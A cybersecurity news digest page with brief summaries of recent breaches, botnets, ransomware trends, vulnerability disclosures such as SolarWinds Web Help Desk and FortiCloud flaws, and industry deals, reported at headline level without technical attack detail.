Breaking cybersecurity news, vulnerability disclosures, and industry updates.
The FBI has seized the notorious RAMP dark web forum in coordination with DOJ. The forum had 14,000+ users and facilitated hundreds of millions in ransomware damages. Leaked database may expose LockBit operator.
Google Threat Intelligence dismantles a Chinese-operated proxy network spanning 9 million Android devices and 13 proxy brands, used by 550+ threat groups including nation-state actors from China, Russia, Iran, and North Korea.
ShinyHunters stole 10 million records from Match Group dating platforms via a vishing attack that compromised Okta SSO credentials. The breach exposed user advertising IDs, IP addresses, and dating profile content.
Four critical vulnerabilities in SolarWinds Web Help Desk allow unauthenticated remote code execution and authentication bypass. CISA confirms active exploitation with February 6 federal deadline.
The Aisuru/Kimwolf botnet launched the largest recorded DDoS attack at 31.4 Tbps, powered by 2 million compromised Android TV boxes infected via exposed ADB ports through residential proxy networks.
NordStellar research reveals 9,251 ransomware incidents in 2025, with Qilin leading at 1,066 attacks (408% increase). December set a two-year record with 1,004 incidents. 2026 projected to exceed 12,000 attacks.
Alphabet's record-breaking acquisition of cloud security startup Wiz awaits final EU regulatory clearance expected February 10, 2026. The deal will reshape the cloud security market and integrate Wiz's CNAPP platform into Google Cloud.
Cisco Talos identified Chinese-speaking threat actor UAT-8099 compromising IIS servers in Asia with BadIIS malware variants, hijacking legitimate websites for SEO poisoning and credential theft.
In March 2024, a Microsoft engineer accidentally discovered a backdoor in xz Utils that had been planted by an attacker who spent nearly three years building trust in the open-source community. The near-miss could have compromised millions of Linux servers.
The EVALUSION campaign uses social engineering, Google Calendar C2, and steganography to distribute Amatera information stealer—part of a technique now used in 47% of observed attacks.
CVE-2026-24858 allows attackers with any FortiCloud account to authenticate to other customers' devices. Arctic Wolf observed automated exploitation creating backdoor admin accounts within seconds.
CVE-2026-24002 allows remote code execution through malicious spreadsheet formulas via Pyodide sandbox escape. Affects government, education, and enterprise deployments.